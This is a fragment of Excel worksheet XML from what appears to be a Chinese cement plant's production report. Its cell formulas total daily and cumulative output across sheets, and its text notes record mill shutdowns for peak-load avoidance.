      <c r="G66" s="194"/>
      <c r="H66" s="194">
        <f>G66+'30'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'30'!K66</f>
        <v>0</v>
      </c>
      <c r="L66" s="194">
        <f>K66+yc!L66</f>
        <v>0</v>
      </c>
      <c r="M66" s="194"/>
      <c r="N66" s="195"/>
      <c r="O66" s="263"/>
      <c r="P66" s="264"/>
      <c r="Q66" s="265"/>
      <c r="R66" s="266"/>
      <c r="S66" s="266"/>
      <c r="T66" s="266"/>
      <c r="U66" s="266"/>
      <c r="V66" s="266"/>
      <c r="W66" s="266"/>
      <c r="X66" s="266"/>
      <c r="Y66" s="266"/>
      <c r="Z66" s="267"/>
    </row>
    <row r="67" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A67" s="191"/>
      <c r="B67" s="191"/>
      <c r="C67" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D67" s="193"/>
      <c r="E67" s="194"/>
      <c r="F67" s="277"/>
      <c r="G67" s="194"/>
      <c r="H67" s="194">
        <f>G67+'30'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'30'!K67</f>
        <v>0</v>
      </c>
      <c r="L67" s="194">
        <f>K67+yc!L67</f>
        <v>0</v>
      </c>
      <c r="M67" s="194"/>
      <c r="N67" s="195"/>
      <c r="O67" s="263"/>
      <c r="P67" s="264"/>
      <c r="Q67" s="268"/>
      <c r="R67" s="269"/>
      <c r="S67" s="269"/>
      <c r="T67" s="269"/>
      <c r="U67" s="269"/>
      <c r="V67" s="269"/>
      <c r="W67" s="269"/>
      <c r="X67" s="269"/>
      <c r="Y67" s="269"/>
      <c r="Z67" s="270"/>
    </row>
    <row r="68" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A68" s="191" t="s">
        <v>263</v>
      </c>
      <c r="B68" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C68" s="193"/>
      <c r="D68" s="193"/>
      <c r="E68" s="194">
        <v>0</v>
      </c>
      <c r="F68" s="194">
        <f>'[15]31'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]31'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'30'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]31'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'30'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]31'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]30'!$Q$77</f>
        <v>1#磨14:30-24:00避峰停机:9.5小时(避峰)。2#磨运行正常。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]31'!$D$43+'[15]31'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]31'!$E$43+'[15]31'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'30'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]31'!$H$43+'[15]31'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'30'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]31'!$K$43+'[15]31'!$K$44</f>
        <v>467.66</v>
      </c>
      <c r="N69" s="207">
        <f>(M69+M70)/50000*100</f>
        <v>0.93532</v>
      </c>
      <c r="O69" s="263"/>
      <c r="P69" s="264"/>
      <c r="Q69" s="265"/>
      <c r="R69" s="266"/>
      <c r="S69" s="266"/>
      <c r="T69" s="266"/>
      <c r="U69" s="266"/>
      <c r="V69" s="266"/>
      <c r="W69" s="266"/>
      <c r="X69" s="266"/>
      <c r="Y69" s="266"/>
      <c r="Z69" s="267"/>
    </row>
    <row r="70" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A70" s="191"/>
      <c r="B70" s="193"/>
      <c r="C70" s="193"/>
      <c r="D70" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E70" s="194"/>
      <c r="F70" s="194">
        <f>'[15]31'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]31'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'30'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]31'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'30'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]31'!$K$45</f>
        <v>0</v>
      </c>
      <c r="N70" s="212"/>
      <c r="O70" s="263"/>
      <c r="P70" s="264"/>
      <c r="Q70" s="268"/>
      <c r="R70" s="269"/>
      <c r="S70" s="269"/>
      <c r="T70" s="269"/>
      <c r="U70" s="269"/>
      <c r="V70" s="269"/>
      <c r="W70" s="269"/>
      <c r="X70" s="269"/>
      <c r="Y70" s="269"/>
      <c r="Z70" s="270"/>
    </row>
    <row r="71" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A71" s="191"/>
      <c r="B71" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C71" s="193"/>
      <c r="D71" s="193"/>
      <c r="E71" s="194"/>
      <c r="F71" s="194"/>
      <c r="G71" s="194"/>
      <c r="H71" s="194">
        <f>G71+'30'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'30'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]27'!$Q$80</f>
        <v>水泥磨:00：00-24:00续停机。</v>
      </c>
      <c r="R71" s="272"/>
      <c r="S71" s="272"/>
      <c r="T71" s="272"/>
      <c r="U71" s="272"/>
      <c r="V71" s="272"/>
      <c r="W71" s="272"/>
      <c r="X71" s="272"/>
      <c r="Y71" s="272"/>
      <c r="Z71" s="273"/>
    </row>
    <row r="72" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A72" s="191"/>
      <c r="B72" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C72" s="193"/>
      <c r="D72" s="193"/>
      <c r="E72" s="194">
        <v>0</v>
      </c>
      <c r="F72" s="194"/>
      <c r="G72" s="194"/>
      <c r="H72" s="194">
        <f>G72+'30'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'30'!K72</f>
        <v>0</v>
      </c>
      <c r="L72" s="194">
        <f>K72+yc!L72</f>
        <v>0</v>
      </c>
      <c r="M72" s="194"/>
      <c r="N72" s="195"/>
      <c r="O72" s="263"/>
      <c r="P72" s="264"/>
      <c r="Q72" s="265"/>
      <c r="R72" s="266"/>
      <c r="S72" s="266"/>
      <c r="T72" s="266"/>
      <c r="U72" s="266"/>
      <c r="V72" s="266"/>
      <c r="W72" s="266"/>
      <c r="X72" s="266"/>
      <c r="Y72" s="266"/>
      <c r="Z72" s="267"/>
    </row>
    <row r="73" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A73" s="191"/>
      <c r="B73" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C73" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D73" s="193"/>
      <c r="E73" s="194"/>
      <c r="F73" s="194"/>
      <c r="G73" s="194"/>
      <c r="H73" s="194">
        <f>G73+'30'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'30'!K73</f>
        <v>0</v>
      </c>
      <c r="L73" s="194">
        <f>K73+yc!L73</f>
        <v>0</v>
      </c>
      <c r="M73" s="194"/>
      <c r="N73" s="195"/>
      <c r="O73" s="263"/>
      <c r="P73" s="264"/>
      <c r="Q73" s="268"/>
      <c r="R73" s="269"/>
      <c r="S73" s="269"/>
      <c r="T73" s="269"/>
      <c r="U73" s="269"/>
      <c r="V73" s="269"/>
      <c r="W73" s="269"/>
      <c r="X73" s="269"/>
      <c r="Y73" s="269"/>
      <c r="Z73" s="270"/>
    </row>
    <row r="74" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A74" s="191"/>
      <c r="B74" s="191"/>
      <c r="C74" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D74" s="193"/>
      <c r="E74" s="194"/>
      <c r="F74" s="194"/>
      <c r="G74" s="194"/>
      <c r="H74" s="194">
        <f>G74+'30'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'30'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]30'!$Q$83</f>
        <v>2#磨：续停。</v>
      </c>
      <c r="R74" s="272"/>
      <c r="S74" s="272"/>
      <c r="T74" s="272"/>
      <c r="U74" s="272"/>
      <c r="V74" s="272"/>
      <c r="W74" s="272"/>
      <c r="X74" s="272"/>
      <c r="Y74" s="272"/>
      <c r="Z74" s="273"/>
    </row>
    <row r="75" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A75" s="282" t="s">
        <v>287</v>
      </c>
      <c r="B75" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C75" s="193"/>
      <c r="D75" s="193"/>
      <c r="E75" s="241"/>
      <c r="F75" s="241"/>
      <c r="G75" s="241"/>
      <c r="H75" s="194">
        <f>G75+'30'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'30'!K75</f>
        <v>0</v>
      </c>
      <c r="L75" s="194">
        <f>K75+yc!L75</f>
        <v>0</v>
      </c>
      <c r="M75" s="241"/>
      <c r="N75" s="241"/>
      <c r="O75" s="263"/>
      <c r="P75" s="283"/>
      <c r="Q75" s="265"/>
      <c r="R75" s="266"/>
      <c r="S75" s="266"/>
      <c r="T75" s="266"/>
      <c r="U75" s="266"/>
      <c r="V75" s="266"/>
      <c r="W75" s="266"/>
      <c r="X75" s="266"/>
      <c r="Y75" s="266"/>
      <c r="Z75" s="267"/>
    </row>
    <row r="76" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A76" s="287"/>
      <c r="B76" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C76" s="193"/>
      <c r="D76" s="193"/>
      <c r="E76" s="241"/>
      <c r="F76" s="241"/>
      <c r="G76" s="241"/>
      <c r="H76" s="194">
        <f>G76+'30'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'30'!K76</f>
        <v>0</v>
      </c>
      <c r="L76" s="194">
        <f>K76+yc!L76</f>
        <v>0</v>
      </c>
      <c r="M76" s="241"/>
      <c r="N76" s="241"/>
      <c r="O76" s="263"/>
      <c r="P76" s="288"/>
      <c r="Q76" s="268"/>
      <c r="R76" s="269"/>
      <c r="S76" s="269"/>
      <c r="T76" s="269"/>
      <c r="U76" s="269"/>
      <c r="V76" s="269"/>
      <c r="W76" s="269"/>
      <c r="X76" s="269"/>
      <c r="Y76" s="269"/>
      <c r="Z76" s="270"/>
    </row>
    <row r="77" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A77" s="287"/>
      <c r="B77" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C77" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D77" s="193"/>
      <c r="E77" s="241"/>
      <c r="F77" s="241"/>
      <c r="G77" s="241"/>
      <c r="H77" s="194">
        <f>G77+'30'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'30'!K77</f>
        <v>0</v>
      </c>
      <c r="L77" s="194">
        <f>K77+yc!L77</f>
        <v>0</v>
      </c>
      <c r="M77" s="241"/>
      <c r="N77" s="241"/>
      <c r="O77" s="292" t="s">
        <v>286</v>
      </c>
      <c r="P77" s="293"/>
      <c r="Q77" s="294"/>
      <c r="R77" s="294"/>
      <c r="S77" s="294"/>
      <c r="T77" s="294"/>
      <c r="U77" s="294"/>
      <c r="V77" s="294"/>
      <c r="W77" s="294"/>
      <c r="X77" s="294"/>
      <c r="Y77" s="294"/>
      <c r="Z77" s="295"/>
    </row>
    <row r="78" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A78" s="287"/>
      <c r="B78" s="191"/>
      <c r="C78" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D78" s="193"/>
      <c r="E78" s="241"/>
      <c r="F78" s="241"/>
      <c r="G78" s="241"/>
      <c r="H78" s="194">
        <f>G78+'30'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'30'!K78</f>
        <v>0</v>
      </c>
      <c r="L78" s="194">
        <f>K78+yc!L78</f>
        <v>0</v>
      </c>
      <c r="M78" s="241"/>
      <c r="N78" s="241"/>
      <c r="O78" s="296"/>
      <c r="P78" s="297"/>
      <c r="Q78" s="298"/>
      <c r="R78" s="298"/>
      <c r="S78" s="298"/>
      <c r="T78" s="298"/>
      <c r="U78" s="298"/>
      <c r="V78" s="298"/>
      <c r="W78" s="298"/>
      <c r="X78" s="298"/>
      <c r="Y78" s="298"/>
      <c r="Z78" s="299"/>
    </row>
    <row r="79" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A79" s="300" t="s">
        <v>311</v>
      </c>
      <c r="B79" s="203" t="s">
        <v>227</v>
      </c>
      <c r="C79" s="203"/>
      <c r="D79" s="203"/>
      <c r="E79" s="301">
        <v>18000</v>
      </c>
      <c r="F79" s="301"/>
      <c r="G79" s="301">
        <f>'[16]31'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'30'!H79</f>
        <v>16177.78</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>163306.25</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]31'!$I$7</f>
        <v>345</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'30'!K79</f>
        <v>15171.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>157062.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]31'!$L$7</f>
        <v>5891.06</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>11.78212</v>
      </c>
      <c r="O79" s="296"/>
      <c r="P79" s="297"/>
      <c r="Q79" s="298"/>
      <c r="R79" s="298"/>
      <c r="S79" s="298"/>
      <c r="T79" s="298"/>
      <c r="U79" s="298"/>
      <c r="V79" s="298"/>
      <c r="W79" s="298"/>
      <c r="X79" s="298"/>
      <c r="Y79" s="298"/>
      <c r="Z79" s="299"/>
    </row>
    <row r="80" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A80" s="300"/>
      <c r="B80" s="203" t="s">
        <v>283</v>
      </c>
      <c r="C80" s="203"/>
      <c r="D80" s="303" t="s">
        <v>250</v>
      </c>
      <c r="E80" s="301"/>
      <c r="F80" s="301"/>
      <c r="G80" s="301">
        <f>'[16]31'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'30'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]31'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'30'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]31'!$Y$15</f>
        <v>0</v>
      </c>
      <c r="N80" s="304">
        <f>(M80+M81)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O80" s="296"/>
      <c r="P80" s="297"/>
      <c r="Q80" s="298"/>
      <c r="R80" s="298"/>
      <c r="S80" s="298"/>
      <c r="T80" s="298"/>
      <c r="U80" s="298"/>
      <c r="V80" s="298"/>
      <c r="W80" s="298"/>
      <c r="X80" s="298"/>
      <c r="Y80" s="298"/>
      <c r="Z80" s="299"/>
    </row>
    <row r="81" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A81" s="300"/>
      <c r="B81" s="203"/>
      <c r="C81" s="203"/>
      <c r="D81" s="203" t="s">
        <v>284</v>
      </c>
      <c r="E81" s="301"/>
      <c r="F81" s="301"/>
      <c r="G81" s="301"/>
      <c r="H81" s="194">
        <f>G81+'30'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'30'!K81</f>
        <v>0</v>
      </c>
      <c r="L81" s="301">
        <f>K81+yc!L81</f>
        <v>0</v>
      </c>
      <c r="M81" s="301"/>
      <c r="N81" s="305"/>
      <c r="O81" s="296"/>
      <c r="P81" s="297"/>
      <c r="Q81" s="298"/>
      <c r="R81" s="298"/>
      <c r="S81" s="298"/>
      <c r="T81" s="298"/>
      <c r="U81" s="298"/>
      <c r="V81" s="298"/>
      <c r="W81" s="298"/>
      <c r="X81" s="298"/>
      <c r="Y81" s="298"/>
      <c r="Z81" s="299"/>
    </row>
    <row r="82" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A82" s="300"/>
      <c r="B82" s="203" t="s">
        <v>253</v>
      </c>
      <c r="C82" s="203"/>
      <c r="D82" s="203"/>
      <c r="E82" s="301"/>
      <c r="F82" s="301"/>
      <c r="G82" s="301"/>
      <c r="H82" s="194">
        <f>G82+'30'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'30'!K82</f>
        <v>0</v>
      </c>
      <c r="L82" s="301">
        <f>K82+yc!L82</f>
        <v>0</v>
      </c>
      <c r="M82" s="301"/>
      <c r="N82" s="302"/>
      <c r="O82" s="296"/>
      <c r="P82" s="297"/>
      <c r="Q82" s="298"/>
      <c r="R82" s="298"/>
      <c r="S82" s="298"/>
      <c r="T82" s="298"/>
      <c r="U82" s="298"/>
      <c r="V82" s="298"/>
      <c r="W82" s="298"/>
      <c r="X82" s="298"/>
      <c r="Y82" s="298"/>
      <c r="Z82" s="299"/>
    </row>
    <row r="83" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A83" s="300"/>
      <c r="B83" s="203" t="s">
        <v>254</v>
      </c>
      <c r="C83" s="203"/>
      <c r="D83" s="203"/>
      <c r="E83" s="301">
        <v>18000</v>
      </c>
      <c r="F83" s="301"/>
      <c r="G83" s="301"/>
      <c r="H83" s="194">
        <f>G83+'30'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'30'!K83</f>
        <v>0</v>
      </c>
      <c r="L83" s="301">
        <f>K83+yc!L83</f>
        <v>0</v>
      </c>
      <c r="M83" s="301"/>
      <c r="N83" s="302"/>
      <c r="O83" s="296"/>
      <c r="P83" s="297"/>
      <c r="Q83" s="298"/>
      <c r="R83" s="298"/>
      <c r="S83" s="298"/>
      <c r="T83" s="298"/>
      <c r="U83" s="298"/>
      <c r="V83" s="298"/>
      <c r="W83" s="298"/>
      <c r="X83" s="298"/>
      <c r="Y83" s="298"/>
      <c r="Z83" s="299"/>
    </row>
    <row r="84" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A84" s="300"/>
      <c r="B84" s="300" t="s">
        <v>231</v>
      </c>
      <c r="C84" s="203" t="s">
        <v>257</v>
      </c>
      <c r="D84" s="203"/>
      <c r="E84" s="301"/>
      <c r="F84" s="301"/>
      <c r="G84" s="301"/>
      <c r="H84" s="194">
        <f>G84+'30'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'30'!K84</f>
        <v>0</v>
      </c>
      <c r="L84" s="301">
        <f>K84+yc!L84</f>
        <v>0</v>
      </c>
      <c r="M84" s="301"/>
      <c r="N84" s="302"/>
      <c r="O84" s="296"/>
      <c r="P84" s="297"/>
      <c r="Q84" s="298"/>
      <c r="R84" s="298"/>
      <c r="S84" s="298"/>
      <c r="T84" s="298"/>
      <c r="U84" s="298"/>
      <c r="V84" s="298"/>
      <c r="W84" s="298"/>
      <c r="X84" s="298"/>
      <c r="Y84" s="298"/>
      <c r="Z84" s="299"/>
    </row>
    <row r="85" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A85" s="300"/>
      <c r="B85" s="300"/>
      <c r="C85" s="203" t="s">
        <v>259</v>
      </c>
      <c r="D85" s="203"/>
      <c r="E85" s="301"/>
      <c r="F85" s="301"/>
      <c r="G85" s="301"/>
      <c r="H85" s="194">
        <f>G85+'30'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'30'!K85</f>
        <v>0</v>
      </c>
      <c r="L85" s="301">
        <f>K85+yc!L85</f>
        <v>0</v>
      </c>
      <c r="M85" s="301"/>
      <c r="N85" s="302"/>
      <c r="O85" s="306"/>
      <c r="P85" s="307"/>
      <c r="Q85" s="308"/>
      <c r="R85" s="308"/>
      <c r="S85" s="308"/>
      <c r="T85" s="308"/>
      <c r="U85" s="308"/>
      <c r="V85" s="308"/>
      <c r="W85" s="308"/>
      <c r="X85" s="308"/>
      <c r="Y85" s="308"/>
      <c r="Z85" s="309"/>
    </row>
    <row r="86" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="R86" s="173"/>
      <c r="S86" s="310" t="s">
        <v>288</v>
      </c>
      <c r="T86" s="311">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
      <c r="U86" s="311"/>
      <c r="V86" s="312">
        <f ca="1">NOW()</f>
        <v>46062.7495486111</v>
      </c>
      <c r="W86" s="173"/>
      <c r="X86" s="173"/>
      <c r="Y86" s="173"/>
    </row>
    <row r="87" s="172" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="88" s="172" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="89" s="172" customFormat="1" ht="15.75" customHeight="1"/>
    <row r="90" s="172" customFormat="1" ht="14.25" customHeight="1"/>
    <row r="91" s="172" customFormat="1" ht="14.25" customHeight="1" spans="1:26">
      <c r="Y91" s="173"/>
    </row>
    <row r="92" ht="14.25" customHeight="1"/>
    <row r="93" ht="14.25" customHeight="1"/>
    <row r="94" ht="14.25" customHeight="1"/>
    <row r="95" ht="14.25" customHeight="1"/>
    <row r="96" ht="14.25" customHeight="1"/>
    <row r="97" ht="14.25" customHeight="1"/>
    <row r="98" ht="14.25" customHeight="1"/>
    <row r="99" ht="14.25" customHeight="1"/>
    <row r="105" s="172" customFormat="1"/>
    <row r="110" s="172" customFormat="1"/>
    <row r="111" s="172" customFormat="1"/>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A3:D4"/>
    <mergeCell ref="O3:Q4"/>
    <mergeCell ref="Q56:Z58"/>
    <mergeCell ref="Q59:Z61"/>
    <mergeCell ref="B62:C63"/>
    <mergeCell ref="Q62:Z64"/>
    <mergeCell ref="Q65:Z67"/>
    <mergeCell ref="Q68:Z70"/>
    <mergeCell ref="B69:C70"/>
    <mergeCell ref="Q71:Z73"/>
    <mergeCell ref="Q74:Z76"/>
    <mergeCell ref="P77:Z85"/>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pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E44" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="H51" sqref="H51"/>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8.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31/31</f>
        <v>1</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182" t="s">
        <v>332</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499.999999999975</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'31'!H5</f>
        <v>652162.78</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6807028.81</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>0</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'31'!K5</f>
        <v>715921.065</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6865992.196</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>203709.539</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>54.4677911764705</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>[10]调整表!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>[10]调整表!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>[10]调整表!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>[10]调整表!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>[10]调整表!$U$101</f>
        <v>31.0439516129032</v>
      </c>
      <c r="W5" s="198">
        <f>[10]调整表!$V$101</f>
        <v>61.8069178082192</v>
      </c>
      <c r="X5" s="198">
        <f>[10]调整表!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>[10]调整表!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>[10]调整表!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>[10]调整表!$D$23+[11]调整表!$D$17+[12]调整表!$D$17+[13]调整表!$D$25+[14]调整表!$D$8+[14]调整表!$D$15+[15]调整表!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>[10]调整表!$E$23+[11]调整表!$E$17+[12]调整表!$E$17+[13]调整表!$E$25+[14]调整表!$E$8+[14]调整表!$E$15+[15]调整表!$E$7</f>
